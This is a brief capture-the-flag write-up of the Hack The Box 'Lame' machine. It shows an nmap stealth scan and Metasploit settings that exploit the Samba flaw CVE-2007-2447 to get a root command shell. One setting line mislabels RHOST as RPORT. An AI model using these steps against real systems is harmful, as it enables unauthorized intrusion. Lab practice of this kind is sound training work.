Lame Write-Up

Jarpiano | Aug 6, 2025

Lame (Easy) Box

Lame is a retired easy machine from HTB focusing on exploiting a basic vulnerability from the Samba service.

Initial Foothold & Escalation

Let’s do a quick NMAP scan to see some open ports. An initial scan of nmap 10.129.236.188 doesn’t bring us anything. Let’s try a more stealthy approach:

sudo nmap <IP> -sS -Pn --disable-arp

This gives us the following output.

Preview Image

If we a version scan, we see that the box has Samba version 3.x - 4.x and the ftp version is 2.3.4. Let’s see if Samba has any vulnerabilities first. A quick google search shows use the CVE-2007-2447 vulnerability. On Metasploit, if we search this up, we get the following exploit.

Preview Image

If we show options, we may get the following options:

  • CHOST
  • CPORT
  • RHOST
  • RPORT
  • LHOST
  • LPORT

We don’t really need CHOST or CPORT so we can ignore them or both set them to nothing using set CHOST "" and set CPORT "". Let’s set them appropriately:

set RPORT <TARGET-IP>
set LHOST <MY-IP

We can leave the ports alone if none of them are taken up.

If we run exploit we should get the following message after the Started TCP Handler: Command shell session 1 opened.

If we do whoami, we see that we are root. We can find the user.txt file in the makis directory and the root.txt file in the root folder.

Fin.